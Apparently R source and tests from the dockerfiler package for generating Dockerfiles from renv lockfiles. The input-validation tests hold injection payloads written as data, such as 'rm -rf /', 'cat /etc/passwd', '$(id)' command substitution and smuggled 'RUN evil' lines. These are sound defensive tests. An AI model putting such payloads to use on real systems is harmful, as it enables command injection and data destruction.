  # context (cran.rstudio.com in the default repos URL is fine and
  # excluded explicitly).
  expect_false(any(grepl("\\brstudio\\b(?!\\.com)", out$Dockerfile, perl = TRUE)))
})

test_that("dock_from_renv rejects shell-active metacharacters in repos URL even though the URL grammar tolerates them", {
  # `.validate_repos` doubles as the escape primitive for the
  # double-quoted shell `echo "options(repos = ...)"` wrapper. Inside
  # `"..."`, the shell still interprets `$`, backtick, backslash and
  # `!`. A repos URL with `$(...)` would expand to a command at
  # `docker build` time even though the URL itself is otherwise
  # well-formed.
  skip_if(is_rdevel, "skip on R-devel")
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      repos = c(CRAN = "https://evil$(id).example.com"),
      renv_version = "0.0.0"
    ),
    "repos"
  )
})

test_that("dock_from_renv accepts a private-registry FROM with host:port/image", {
  # The Docker reference grammar permits `<host>:<port>/<image>`.
  # The validator must not reject this common private-registry form.
  skip_if(is_rdevel, "skip on R-devel")
  expect_silent(
    dockerfiler:::.validate_FROM("localhost:5000/myimage")
  )
  expect_silent(
    dockerfiler:::.validate_FROM("registry.example.com:443/org/img:1.2")
  )
  expect_silent(
    dockerfiler:::.validate_FROM("rocker/r-base:4.5")
  )
  expect_silent(
    dockerfiler:::.validate_FROM(
      "rocker/r-base@sha256:abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789"
    )
  )
})

test_that("dock_from_renv rejects shell-metacharacter / unsafe values across user-supplied params", {
  skip_if(is_rdevel, "skip on R-devel")

  # use_pak: scalar logical. A non-logical value would be interpolated raw
  # into `echo "options(renv.config.pak.enabled = %s, ...)"`, breaking
  # the outer shell quoting and allowing command substitution at build
  # time.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      use_pak = 'TRUE) ; system("evil") ; #',
      renv_version = "0.0.0"
    ),
    "use_pak"
  )

  # names(repos): must be simple identifiers. `dput()` would otherwise
  # wrap shell-unsafe names in backticks, which inside the outer
  # double-quoted `echo "..."` triggers command substitution.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      repos = c(`CRAN; system('evil')` = "https://cran.rstudio.com/"),
      renv_version = "0.0.0"
    ),
    "names\\(repos\\)"
  )

  # AS: docker build-stage name. Newlines or shell metacharacters
  # would break the `FROM <X> AS <Y>` directive.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      AS = "stage1\nRUN evil",
      user = NULL,
      renv_version = "0.0.0"
    ),
    "`AS`"
  )

  # extra_sysreqs: each element must be a Debian package name.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      extra_sysreqs = "libfoo; rm -rf /",
      renv_version = "0.0.0"
    ),
    "extra_sysreqs"
  )

  # NA in vector inputs must not crash the validator with
  # "missing value where TRUE/FALSE needed"; treat as invalid and
  # raise the same clear message as other malformed entries.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      extra_sysreqs = c("libcurl", NA_character_),
      renv_version = "0.0.0"
    ),
    "extra_sysreqs"
  )
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      repos = c(CRAN = NA_character_),
      renv_version = "0.0.0"
    ),
    "repos"
  )
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      repos = setNames(
        "https://cran.rstudio.com/",
        NA_character_
      ),
      renv_version = "0.0.0"
    ),
    "names\\(repos\\)"
  )

  # repos: each URL must look like a real http(s) URL.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      repos = c(CRAN = "https://evil'); cat /etc/passwd; #"),
      renv_version = "0.0.0"
    ),
    "repos"
  )

  # renv_version: must look like a version string. Anything else would
  # be interpolated raw into `R -e 'install_version("renv", version =
  # "<x>")'` and could break the inner quoting.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      renv_version = '"); system("evil"); #'
    ),
    "renv_version"
  )

  # FROM: docker image reference.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse\nRUN evil",
      user = NULL,
      renv_version = "0.0.0"
    ),
    "FROM"
  )

  # renv_paths_cache: absolute path, no shell metacharacters or newlines.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = NULL,
      renv_paths_cache = "/foo\nRUN evil",
      renv_version = "0.0.0"
    ),
    "renv_paths_cache"
  )
})

test_that("dock_from_renv rejects a lockfile path whose basename contains shell metacharacters", {
  skip_if(is_rdevel, "skip on R-devel")
  # Spaces in the basename would break the COPY directive
  # (`COPY foo bar.lock renv.lock` parses as src=foo, dst=bar.lock).
  bad <- tempfile(pattern = "lock with space ")
  file.copy(the_lockfile, bad)
  on.exit(unlink(bad), add = TRUE)
  expect_error(
    dock_from_renv(
      lockfile = bad,
      FROM = "rocker/verse",
      user = NULL,
      renv_version = "0.0.0"
    ),
    "lockfile"
  )
})

test_that("dock_from_renv validates the renv version read from the lockfile, not only the user-supplied one", {
  skip_if(is_rdevel, "skip on R-devel")
  # `renv_version` is interpolated raw into the generated
  # `R -e 'remotes::install_version("renv", version = "<x>")'` line, which
  # runs as root at `docker build` time. `.validate_renv_version()` must be
  # applied to the value resolved from `lock$Packages$renv$Version` (an
  # untrusted lockfile a user may have received from a colleague, a vendored
  # project, or a CI cache), not only to a user-supplied `renv_version=`.
  # A crafted lockfile carrying `'1.0.0"); system("..."); ("'` would
  # otherwise break out of the inner R string and execute arbitrary code.
  lock <- jsonlite::read_json(
    system.file("renv_with_1.0.0.lock", package = "dockerfiler"),
    simplifyVector = TRUE,
    simplifyDataFrame = FALSE,
    simplifyMatrix = FALSE
  )
  lock$Packages$renv$Version <- '1.0.0"); system("touch /tmp/dockerfiler_pwned"); ("'
  malicious_lf <- file.path(dir_build, "malicious-renv.lock")
  jsonlite::write_json(lock, path = malicious_lf, auto_unbox = TRUE, pretty = TRUE)
  on.exit(unlink(malicious_lf), add = TRUE)

  expect_error(
    dock_from_renv(
      lockfile = malicious_lf,
      FROM = "rocker/verse",
      user = NULL,
      sysreqs = FALSE
      # NOTE: no `renv_version =` -> the value comes from the lockfile.
    ),
    "renv_version"
  )
})

unlink(dir_build, recursive = TRUE)

#' Get system requirements
#'
#' This function retrieves information about the
#' system requirements using the `pak::pkg_sysreqs()`.
#'
#' @param packages character vector. Packages names.
#' @param batch_n numeric. Number of simultaneous packages to ask.
#' @param quiet Boolean. If `TRUE` the function is quiet.
#'
#' @importFrom utils download.file
#' @importFrom jsonlite fromJSON
#' @importFrom remotes package_deps
#'
#' @export
#'
#' @return A vector of system requirements.
#'
#' @examples
#' \dontrun{
#' get_sysreqs("glue")
#' get_sysreqs(c("curl", "xml2"))
#' }
get_sysreqs <- function(
  packages,
  quiet = TRUE,
  batch_n = 30
) {
  all_deps <- sort(
    unique(
      c(
        packages,
        unlist(
          remotes::package_deps(packages)$package
        )
      )
    )
  )
  raw_output <- pak::pkg_sysreqs(pkg = all_deps, sysreqs_platform = "debian")
  out <- unlist(raw_output$packages$system_packages)
  sort(unique(out[!is.na(out)]))
}

test_that("get_sysreqs works", {
  skip_on_cran()
  skip_if(is_rdevel, "Skip R-devel")
  # pak::pkg_sysreqs(sysreqs_platform = "debian") returns no
  # system_packages on macOS hosts, so this function returns
  # character(0) regardless of the input package.
  skip_on_os("mac")
  res <- get_sysreqs(
    c("mongolite"),
    quiet = TRUE
  )
  expect_true(
    length(res) > 0
  )
  expect_true(
    inherits(res, "character")
  )

})

#' @importFrom memoise memoise
#' @noRd
pkg_sysreqs_mem <- memoise::memoise(
    pak::pkg_sysreqs
)


#' Create a Dockerfile from an `renv.lock` file
#'
#' @param lockfile Path to an `renv.lock` file to use as an input.
#'   The `basename(lockfile)` must be located at the docker build
#'   context root at `docker build` time, because the generated
#'   Dockerfile emits `COPY <basename(lockfile)> renv.lock`. Validated
#'   as a single string whose basename contains only alphanumerics,
#'   dots, underscores or hyphens (no spaces or shell metacharacters).
#' @param FROM Docker image to start FROM. Default is `"rocker/r-ver"`,
#'   which is multi-arch (linux/amd64 + linux/arm64) and gets the
#'   lockfile's R version appended at codegen time (e.g.
#'   `rocker/r-ver:4.5.0`). Pass an already-tagged or
#'   already-digested reference (`rocker/r-ver:4.4.1`,
#'   `rocker/r-base@sha256:...`) to override the auto-tag; the user's
#'   tag is honoured verbatim, even if it differs from the lockfile's
#'   `R$Version`. R-devel and release-candidate users whose lockfile
#'   records `r-devel` or `4.5.0-RC` may want to pass an explicit
#'   tag like `FROM = "rocker/r-ver:devel"` to control which base
#'   image is pulled.
#'   Validated as a Docker image reference
#'   (`<host>[:<port>]/<image>[:<tag>][@sha256:<hex>]`); other values
#'   raise an error to prevent shell-metacharacter injection into the
#'   generated FROM directive.
#' @param AS The AS of the Dockerfile. Default is `NULL`. When non-NULL,
#'   validated as a simple build-stage name (`^[a-zA-Z0-9][a-zA-Z0-9._-]*$`).
#' @param distro - deprecated - only debian/ubuntu based images are supported
#' @param sysreqs boolean. If `TRUE`, the Dockerfile will contain sysreq installation.
#' @param expand boolean. If `TRUE` each system requirement will have its own `RUN` line.
#' @param repos character. The URL(s) of the repositories to use for
#'   `options("repos")`. Default is
#'   `c(CRAN = "https://p3m.dev/cran/latest")` (Posit Public Package
#'   Manager). When the URL is recognized as a PPM host
#'   (`packagemanager.posit.co`, `packagemanager.rstudio.com`, or
#'   `p3m.dev`), the codegen rewrites it to the
#'   `__linux__/$VERSION_CODENAME/` shape so the build pulls Linux
#'   binaries (5-10x faster than building from source). Each value
#'   must look like an http(s) URL (no quotes, spaces or newlines);
#'   each name (when set) must be a simple identifier
#'   (`^[A-Za-z][A-Za-z0-9._-]*$`). Other values raise an error to
#'   prevent injection into the generated `echo "options(...)"` shell
#'   command.
#' @param extra_sysreqs character vector. Extra debian system requirements.
#'   Will be installed with apt-get install. Each entry must be a Debian
#'   package name (`^[a-z0-9][a-z0-9.+-]+$`); other values raise an error
#'   to prevent injection into the generated apt-get RUN.
#' @param renv_version character or `NULL`. The renv version to install.
#'   The argument has three distinct modes, deliberately encoded with
#'   the missing-vs-`NULL` distinction:
#'   - **not supplied (default)**: read the renv version from the
#'     `renv.lock` file. If the lockfile does not pin renv either,
#'     the latest available version is installed.
#'   - `NULL` (explicit): always install the latest renv from the
#'     configured repos, even when the lockfile pins a specific
#'     version.
#'   - a character string such as `"1.0.0"`: install that specific
#'     version regardless of what the lockfile says.
#'
#'   When supplied as a string, validated as a version-like token
#'   (`^[0-9]+(\.[0-9]+){0,3}([-.][a-zA-Z0-9]+)?$`).
#' @param use_pak boolean. If `TRUE` use pak to deal with dependencies
#'   during `renv::restore()`. FALSE by default. Must be a single
#'   `TRUE` or `FALSE` (no `NA`, no vector).
#' @param user Name of the user the runtime container drops privilege
#'   to before the `renv::restore()` step (and therefore at runtime).
#'   Default is `"rstudio"` so the generated image runs as a non-root
#'   user out of the box, which is the recommended security posture.
#'
#'   The Dockerfile is emitted in two halves: every step that needs
#'   root (apt-get, R install commands, `chown` of the renv cache)
#'   runs first; then a `USER <user>` directive drops privilege; then
#'   the `renv::restore()` cache-mount RUN happens.
#'
#'   To make this work regardless of the FROM image, the package
#'   emits a defensive `RUN id -u <user> >/dev/null 2>&1 ||
#'   useradd -m -d /home/<user> -s /bin/bash <user>` early. On
#'   rocker/* images the `useradd` is a no-op (the user already
#'   exists); on `r-base`, `ubuntu:*`, `debian:*` it creates the user
#'   with the standard home directory.
#'
#'   Pass `user = NULL` to opt out: no `USER` directive is emitted
#'   and the container runs as root (the previous behaviour).
#'   Pass any other string to use that user instead of `rstudio`.
#'   Custom homes (e.g. `/srv/myapp`) require also passing an
#'   explicit `renv_paths_cache`.
#'
#'   debian/ubuntu images only (`useradd` is the standard form);
#'   for alpine-based images you must pass `user = NULL` and handle
#'   user creation yourself with the alpine-native `adduser`.
#'
#'   The argument is validated at codegen time against
#'   `^[a-zA-Z_][a-zA-Z0-9_-]{0,31}$` (POSIX-style username, max 32
#'   chars, no shell metacharacters). Other values raise an error
#'   to prevent metacharacter injection into the generated `RUN`
#'   commands.
#' @param dependencies What kinds of dependencies to install. Most commonly
#'   one of the following values:
#'   - `NA`: only required (hard) dependencies,
#'   - `TRUE`: required dependencies plus optional and development
#'     dependencies,
#'   - `FALSE`: do not install any dependencies. (You might end up with a
#'     non-working package, and/or the installation might fail.)
#' @param sysreqs_platform System requirements platform.`ubuntu` by default. If `NULL`, then the  current platform is used. Can be : "ubuntu-22.04" if needed to fit with the `FROM` Operating System. Only debian or ubuntu based images are supported
#' @param github_pat character. How to provide a GitHub PAT to
#'   `renv::restore()` for private dependency repositories. One of
#'   `"none"` (default; the generated Dockerfile does not reference
#'   any PAT), `"build_arg"` (emit `ARG GITHUB_PAT` + `ENV` propagation;
#'   pass with `--build-arg GITHUB_PAT=$GITHUB_PAT`; the PAT will be
#'   visible in the image metadata), or `"secret"` (BuildKit secret
#'   mount on the `renv::restore()` RUN; the PAT is never persisted in
#'   the image; requires BuildKit, so pass with
#'   `DOCKER_BUILDKIT=1 docker build --secret id=github_pat,env=GITHUB_PAT ...`).
#' @param renv_paths_cache character or `NULL`. Path used as the
#'   default of the `RENV_PATHS_CACHE` build-arg, propagated as an
#'   `ENV` variable, and used as the cache mount target for
#'   `renv::restore()`. Lets users override the renv cache location
#'   at image build time via `--build-arg RENV_PATHS_CACHE=...`.
#'
#'   When `NULL` (the default), the cache path is derived from
#'   `user`: `/root/.cache/R/renv` when `user = NULL`, and
#'   `/home/<user>/.cache/R/renv` when `user` is a non-root username.
#'   Pass an explicit string to override the convention (e.g. for
#'   custom-home users like `user = "myapp"` with home at
#'   `/srv/myapp`, pass `renv_paths_cache = "/srv/myapp/.cache/R/renv"`).
#'
#'   In all cases (`user = NULL` excepted), the generated Dockerfile
#'   emits a single `RUN mkdir -p "${RENV_PATHS_CACHE}" && chown -R <user>:<user> "${RENV_PATHS_CACHE}"`
#'   step right before the `USER <user>` directive so the cache mount
#'   target is writable from the un-privileged user. The cache path
#'   is double-quoted at shell expansion time so a build-arg
#'   override containing whitespace cannot break the command.
#' @importFrom utils getFromNamespace
#' @return A R6 object of class `Dockerfile`.
#' @details
#'
#' System requirements for packages are provided
#' through RStudio Package Manager via the pak
#' package. The install commands provided from pak
#' are added as `RUN` directives within the `Dockerfile`.
#'
#' The R version is taken from the `renv.lock` file.
#' Packages are installed using `renv::restore()` which ensures
#' that the proper package version and source is used when installed.
#'
#' @importFrom attempt map_try_catch
#' @importFrom glue glue
#' @importFrom pak pkg_sysreqs
#' @importFrom purrr keep_at pluck

#' @export
#' @examples
#' \dontrun{
#' dock <- dock_from_renv("renv.lock")
#' dock$write("Dockerfile")
#' }
dock_from_renv <- function(
  lockfile = "renv.lock",
  distro = NULL,
  FROM = "rocker/r-ver",
  AS = NULL,
  sysreqs = TRUE,
  repos = c(CRAN = "https://p3m.dev/cran/latest"),
  expand = FALSE,
  extra_sysreqs = NULL,
  use_pak = FALSE,
  user = "rstudio",
  dependencies = NA,
  sysreqs_platform = "ubuntu",
  renv_version,
  github_pat = c("none", "build_arg", "secret"),
  renv_paths_cache = NULL
) {
  github_pat <- match.arg(github_pat)
  .validate_lockfile(lockfile)
  .validate_FROM(FROM)
  .validate_AS(AS)
  .validate_repos(repos)
  .validate_extra_sysreqs(extra_sysreqs)
  .validate_scalar_logical(use_pak, "use_pak")
  if (!missing(renv_version)) {
    .validate_renv_version(renv_version)
  }
  .validate_renv_paths_cache(renv_paths_cache)
  if (!is.null(user)) {
    # `user` is interpolated into shell commands (id, useradd, chown, USER).
    # Reject anything that is not a strict POSIX username so a caller passing
    # ``"; rm -rf /"`` or ``"bad user"`` cannot inject into / break the
    # generated Dockerfile.
    if (
      !is.character(user) ||
        length(user) != 1L ||
        !grepl("^[a-zA-Z_][a-zA-Z0-9_-]{0,31}$", user)
    ) {
      stop(
        "`user` must be a single string matching the POSIX username ",
        "regex /^[a-zA-Z_][a-zA-Z0-9_-]{0,31}$/, ",
        "got: ",
        deparse(user)
      )
    }
  }
  if (is.null(renv_paths_cache)) {
    renv_paths_cache <- if (is.null(user)) {
      "/root/.cache/R/renv"
    } else {
      sprintf("/home/%s/.cache/R/renv", user)
    }
  }
  lock <- jsonlite::read_json(
    lockfile,
    simplifyVector = TRUE,
    simplifyDataFrame = FALSE,
    simplifyMatrix = FALSE
  )

  # start the dockerfile
  R_major_minor <- lock$R$Version
  .validate_r_version(R_major_minor)
  dock <- Dockerfile$new(
    FROM = gen_base_image(
      r_version = R_major_minor,
      FROM = FROM
    ),
    AS = AS
  )
  if (!is.null(user)) {
    dock$RUN(
      sprintf(
        "id -u %s >/dev/null 2>&1 || useradd -m -d /home/%s -s /bin/bash %s",
        user,
        user,
        user
      )
    )
  }
  .github_pat_setup(dock, github_pat)
  dock$ARG("RENV_PATHS_CACHE", default = renv_paths_cache)
  dock$ENV(key = "RENV_PATHS_CACHE", value = "${RENV_PATHS_CACHE}")
  # USER (if any) is emitted later, after the apt-get / R install steps
  # that need root and after the chown of RENV_PATHS_CACHE.
  # get renv version

  if (missing(renv_version)) {
    # The lockfile is untrusted input: its `Packages$renv$Version` is
    # interpolated into the generated `R -e
    # 'remotes::install_version(...)'` line, which runs as root at
    # `docker build` time. Validate it with the same regex applied to a
    # user-supplied `renv_version` (which is validated at function entry).
    renv_version <- lock$Packages$renv$Version
    if (!is.null(renv_version)) {
      .validate_renv_version(renv_version)
    }
  }

  message("renv version = ",
          ifelse(!is.null(renv_version), renv_version, "the most up to date version in the repos")
          )


  distro_args <- list(sysreqs_platform = sysreqs_platform)

  install_cmd <- "apt-get install -y"
  update_cmd <-"apt-get update -y"
  clean_cmd <- "rm -rf /var/lib/apt/lists/*"

  pkgs <- names(lock$Packages)

  if (sysreqs) {

    # please wait during system requirement calculation
    cat_bullet(
      "Please wait while we compute system requirements...",
      bullet = "info",
      bullet_col = "green"
    )

    message(
      sprintf(
        "Fetching system dependencies for %s package(s) records.",
        length(pkgs)
      )
    )

    pkg_os <- lapply(
      pkgs,
      FUN = function(x) {
        c(
          list(pkg = x,
               dependencies = dependencies),
          distro_args
        )
      }
    )


    pkg_sysreqs <- unlist(attempt::map_try_catch(
      pkg_os,
      function(x) {
        keep_at(
          pluck(
            do.call(pkg_sysreqs_mem, x),
            "packages"
          ),
          "system_packages"
        )
      },
      .e = ~ character(0)
    ))





    pkg_installs <-
      lapply(
        X = unique(pkg_sysreqs),
        FUN = function(.x) {
          paste0(install_cmd, " ", .x)
        }
      )

    if (length(unlist(pkg_installs)) == 0) {
      cat_bullet(
        "No sysreqs required",
        bullet = "info",
        bullet_col = "green"
      )
    }

    cat_green_tick("Done") # TODO animated version ?
  } else {
    pkg_installs <- NULL
  }

  # extra_sysreqs




  if (length(extra_sysreqs) > 0) {
    extra <- paste(
      install_cmd,
      extra_sysreqs
    )
    pkg_installs <- unique(c(pkg_installs, extra))
  }





  # compact
  if (!expand) {
    # we compact sysreqs
    pkg_installs <- compact_sysreqs(
      pkg_installs,
      update_cmd = update_cmd,
      install_cmd = install_cmd,
      clean_cmd = clean_cmd
    )

  } else {
    dock$RUN(update_cmd)
  }

  do.call(dock$RUN, list(pkg_installs))

  if (expand) {
    dock$RUN(clean_cmd)
  }

  repos_as_character <- repos_as_character(repos)
  dock$RUN("mkdir -p /usr/local/lib/R/etc/ /usr/lib/R/etc/")

  dock$RUN(
    sprintf(
      "echo \"options(renv.config.pak.enabled = %s, repos = %s, download.file.method = 'libcurl', Ncpus = 4)\" | tee /usr/local/lib/R/etc/Rprofile.site | tee /usr/lib/R/etc/Rprofile.site",
      use_pak,
      repos_as_character
    )
  )
  .patch_rprofile_for_ppm(dock, repos)


  if (!is.null(renv_version)){
    dock$RUN("R -e 'install.packages(\"remotes\")'")
      install_renv_string <- paste0(
        "R -e 'remotes::install_version(\"renv\", version = \"",
        renv_version,
        "\")'"
      )
      dock$RUN(install_renv_string)

  } else {
    # renv_version = NULL: use the latest renv from the configured repos.
    # `remotes` is only needed for the install_version() path above.
    dock$RUN("R -e 'install.packages(\"renv\")'")
  }

  dock$COPY(basename(lockfile), "renv.lock")
  if (!is.null(user)) {
    # Drop privilege right before the cache-mount renv::restore RUN.
    # The mkdir + chown make the cache target writable by `user` even
    # though the Docker BuildKit cache mount itself is created on-demand.
    # Single RUN with `&&` keeps the image layer count down and the
    # quoted `"${RENV_PATHS_CACHE}"` survives a build-arg with spaces.
    dock$RUN(
      sprintf(
        'mkdir -p "${RENV_PATHS_CACHE}" && chown -R %s:%s "${RENV_PATHS_CACHE}"',
        user,
        user
      )
    )
    dock$USER(user)
  }
  dock$RUN(
    paste0(
      "--mount=type=cache,id=renv-cache,target=${RENV_PATHS_CACHE} ",
      .github_pat_run_prefix(github_pat),
      "R -e 'renv::restore()'"
    )
  )
  .github_pat_announce(github_pat)
  dock
}


#' Patch the Rprofile.site line so PPM serves Linux binaries.
#'
#' Modifications applied conditionally to the `RUN ... tee Rprofile.site`
#' line previously written by `dock_from_renv()`:
#'  1. CRAN URL rewritten to the `__linux__/$VERSION_CODENAME/` PPM variant
#'     (codename resolved from /etc/os-release at image build time). Skipped
#'     if the user already pinned a codename or a snapshot date.
#'  2. `HTTPUserAgent` added in the strict format required by PPM
#'     (`R (<version> <platform> <arch> <os>)`). Without it, PPM falls back
#'     to source even with a `__linux__/` URL.
#'  3. `renv.config.repos.override` set to the same PPM URL, so that
#'     `renv::restore()` uses PPM instead of the repo URL recorded in the
#'     lockfile (renv prefers lockfile repos by default; without this
#'     override, fixes 1 and 2 are bypassed during `restore()`).
#'  4. The `RUN` is prefixed with `. /etc/os-release && ` when (and only
#'     when) `$VERSION_CODENAME` ends up in the line.
#'
#' Only fires when `repos` is a single-entry vector named `CRAN` whose URL
#' is on PPM. Multi-entry vectors and other shapes are intentionally left
#' untouched -- rebuilding a multi-key `repos = c(...)` block robustly is
#' out of scope.
#' @noRd
.patch_rprofile_for_ppm <- function(dock, repos) {
  # Match the three current PPM host shapes: the original
  # `packagemanager.rstudio.com`, the rebranded `packagemanager.posit.co`,
  # and the short `p3m.dev` (which Posit started promoting in 2024 as
  # the recommended URL for binary mirrors). Enumerate explicitly to
  # avoid the `(posit|rstudio).(co|com)` Cartesian-product trap that
  # would also accept `posit.com` and `rstudio.co` (neither is a real
  # Posit-managed host).
  ppm_pattern <- paste0(
    "^https?://(",
    "packagemanager\\.posit\\.co|",
    "packagemanager\\.rstudio\\.com|",
    "p3m\\.dev",
    ")/"
  )
  if (length(repos) != 1L || !identical(names(repos), "CRAN")) {
    return(invisible(NULL))
  }
  user_url <- repos[["CRAN"]]
  if (!grepl(ppm_pattern, user_url)) {
    return(invisible(NULL))
  }

  rps_idx <- grep("tee /usr/local/lib/R/etc/Rprofile\\.site", dock$Dockerfile)
  if (length(rps_idx) != 1L) return(invisible(NULL))

  patched <- dock$Dockerfile[rps_idx]

  # Strip a single trailing slash so `cran/latest/` matches `cran/latest`.
  user_url_norm <- sub("/$", "", user_url)
  # Preserve the user's scheme + host on rewrite (so a
  # `packagemanager.rstudio.com` URL stays on rstudio.com and is not
  # silently swapped to posit.co). The PPM detection regex above only
  # matches the three Posit-managed PPM hosts; non-PPM internal mirrors are
  # not entered into this branch at all.
  user_host_prefix <- sub("/cran(/.*)?$", "", user_url_norm)

  # Only rewrite when the URL is the bare `cran` or `cran/latest` form.
  # Anything else (already-pinned codename, snapshot date, custom path)
  # is left alone so we never silently clobber the user's intent.
  url_suffix <- sub("^.*/cran/?", "", user_url_norm)
  rewrite_url <- url_suffix == "" || url_suffix == "latest"
  if (rewrite_url) {
    rewritten_url <- sprintf(
      "%s/cran/__linux__/$VERSION_CODENAME/latest",
      user_host_prefix
    )
    patched <- sub(
      "repos = c\\(CRAN = '[^']*'\\)",
      sprintf("repos = c(CRAN = '%s')", rewritten_url),
      patched
    )
    override_url <- rewritten_url
  } else {
    override_url <- user_url
  }

  # Force renv::restore() to use the configured PPM URL instead of the repos
  # recorded in the lockfile (cf. ?renv::config -- option declared as
  # "primarily useful for deployment / continuous integration"). Without
  # this, the URL rewrite above is bypassed during restore().
  if (!grepl("renv\\.config\\.repos\\.override", patched)) {
    repos_override <- sprintf(
      ", renv.config.repos.override = c(CRAN = '%s')",
      override_url
    )
    patched <- sub(
      "(renv\\.config\\.pak\\.enabled = (TRUE|FALSE))",
      paste0("\\1", repos_override),
      patched
    )
  }

  # The quadruple backslashes produce a literal `\$` in the Dockerfile RUN,
  # so the shell does not expand $platform / $arch / $os and R sees them as
  # R.Version()$platform when sourcing Rprofile.site.
  user_agent <- paste0(
    ", HTTPUserAgent = sprintf('R (%s %s %s %s)',",
    " getRversion(),",
    " R.Version()\\\\$platform, R.Version()\\\\$arch, R.Version()\\\\$os)"
  )
  if (!grepl("HTTPUserAgent", patched)) {
    patched <- sub(
      "(, Ncpus = [0-9]+)\\)",
      paste0("\\1", user_agent, ")"),
      patched
    )
  }

  # Only prefix `. /etc/os-release && ` when the line actually references
  # $VERSION_CODENAME -- otherwise the prefix is dead weight.
  if (grepl("\\$VERSION_CODENAME", patched) &&
      !grepl("/etc/os-release", patched)) {
    patched <- sub("^RUN ", "RUN . /etc/os-release && ", patched)
  }

  dock$Dockerfile[rps_idx] <- patched
  invisible(NULL)
}

n_temp <- withr::local_tempdir(pattern = "dockerbuild")
file.copy("renv.lock", n_temp)
skip_if(is_rdevel, "skip on R-devel")
withr::with_dir(
  n_temp,
  {
    test_that("dockerfile is buildable", {
      # descdir <- tempfile(pattern = "desc")
      # dir.create(descdir)
      # file.copy("DESCRIPTION", descdir)
      my_dock <- dock_from_renv(lockfile = "renv.lock")
      cat(".RData
.Rhistory
.git
.gitignore
manifest.json
rsconnect/
.Rproj.user", file = ".dockerignore")
      # file.edit(".dockerignore")
      my_dock$write("Dockerfile")



      skip_on_cran()
      out_v <- system("docker -v")
      skip_if_not(out_v == 0) # docker not available

      out_linux <- system("docker run rocker/r-base")

      skip_if_not(out_linux == 2) # image operating system "linux" cannot be used on this platform

      out1 <- system("docker run hello-world ")
      expect_equal(out1, 0)

      out <- system("docker build . --file Dockerfile ", wait = TRUE)
      # file.edit(tpf)
      expect_equal(out, 0)

      unlink(".dockerignore")
    })
  }
)

R_USER_CACHE_DIR<-tempfile()
dir.create(R_USER_CACHE_DIR)
Sys.setenv("R_USER_CACHE_DIR"=R_USER_CACHE_DIR)
r_version <- R.Version()$version.string
is_rdevel <- grepl("unstable", r_version)
# is_debian <- grepl("debian", tolower(Sys.info()['release']))

base_pkg_ <- c(
  "base",
  "boot",
  "class",
  "cluster",
  "codetools",
  "compiler",
  "datasets",
  "foreign",
  "graphics",
  "grDevices",
  "grid",
  "KernSmooth",
  "lattice",
  "MASS",
  "Matrix",
  "methods",
  "mgcv",
  "nlme",
  "nnet",
  "parallel",
  "rpart",
  "spatial",
  "splines",
  "stats",
  "stats4",
  "survival",
  "tcltk",
  "tools",
  "utils"
)

quote_not_na <- function(x){
  x[!is.na(x)] <- paste0('\"',x[!is.na(x)],'\"')
  x
}




#' Create a Dockerfile from a DESCRIPTION
#
#' @param path path to the DESCRIPTION file to use as an input.
#' @param FROM The FROM of the Dockerfile. Default is
#'   `paste0("rocker/r-ver:", R.Version()$major, ".", R.Version()$minor)`.
#'   Validated as a Docker image reference (alphanumerics, dot, slash,
#'   dash, underscore, optional `:tag` and / or `@sha256:<hex>`); other
#'   values raise an error to prevent shell-metacharacter injection
#'   into the generated FROM directive.
#' @param AS The build-stage name of the Dockerfile (`FROM ... AS <name>`).
#'   Default is `NULL` (no `AS`). When non-`NULL`, validated as a simple
#'   build-stage name (`^[a-zA-Z0-9][a-zA-Z0-9._-]*$`).
#' @param sysreqs boolean. If TRUE, the Dockerfile will contain sysreq installation.
#' @param repos character. The URL(s) of the repositories to use for
#'   `options("repos")`. Default is `c(CRAN = "https://p3m.dev/cran/latest")`
#'   (Posit Public Package Manager). When `repos` is a single `CRAN`-keyed
#'   PPM URL (`packagemanager.posit.co`, `packagemanager.rstudio.com`, or
#'   `p3m.dev`), the codegen rewrites it to the
#'   `__linux__/$VERSION_CODENAME/` shape (codename resolved from
#'   `/etc/os-release` at image build time) and adds the strict
#'   `HTTPUserAgent` PPM requires, so the build pulls pre-compiled Linux
#'   binaries instead of compiling from source. Pass the legacy
#'   `c(CRAN = "https://cran.rstudio.com/")` to opt out. Each value must
#'   look like an http(s) URL (no quotes, spaces or newlines); each name
#'   (when set) must be a simple identifier (`^[A-Za-z][A-Za-z0-9._-]*$`).
#'   Other values raise an error to prevent injection into the generated
#'   `echo "options(...)"` shell command.
#' @param expand boolean. If `TRUE` each system requirement will have its own `RUN` line.
#' @param build_from_source boolean. If `TRUE` no tar.gz is created and
#'     the Dockerfile directly mount the source folder.
#' @param update_tar_gz boolean. If `TRUE` and `build_from_source` is also `TRUE`,
#'     an updated tar.gz is created.
#' @param extra_sysreqs character vector. Extra debian system requirements.
#'   Will be installed with apt-get install. Each entry must be a Debian
#'   package name (`^[a-z0-9][a-z0-9.+-]+$`); other values raise an error
#'   to prevent injection into the generated apt-get RUN.
#' @param github_pat character. How to provide a GitHub PAT to
#'   `remotes::install_github()` for private dependency repositories.
#'   One of `"none"` (default; the generated Dockerfile does not
#'   reference any PAT), `"build_arg"` (emit `ARG GITHUB_PAT` + `ENV`
#'   propagation; pass with `--build-arg GITHUB_PAT=$GITHUB_PAT`; the
#'   PAT will be visible in the image metadata), or `"secret"`
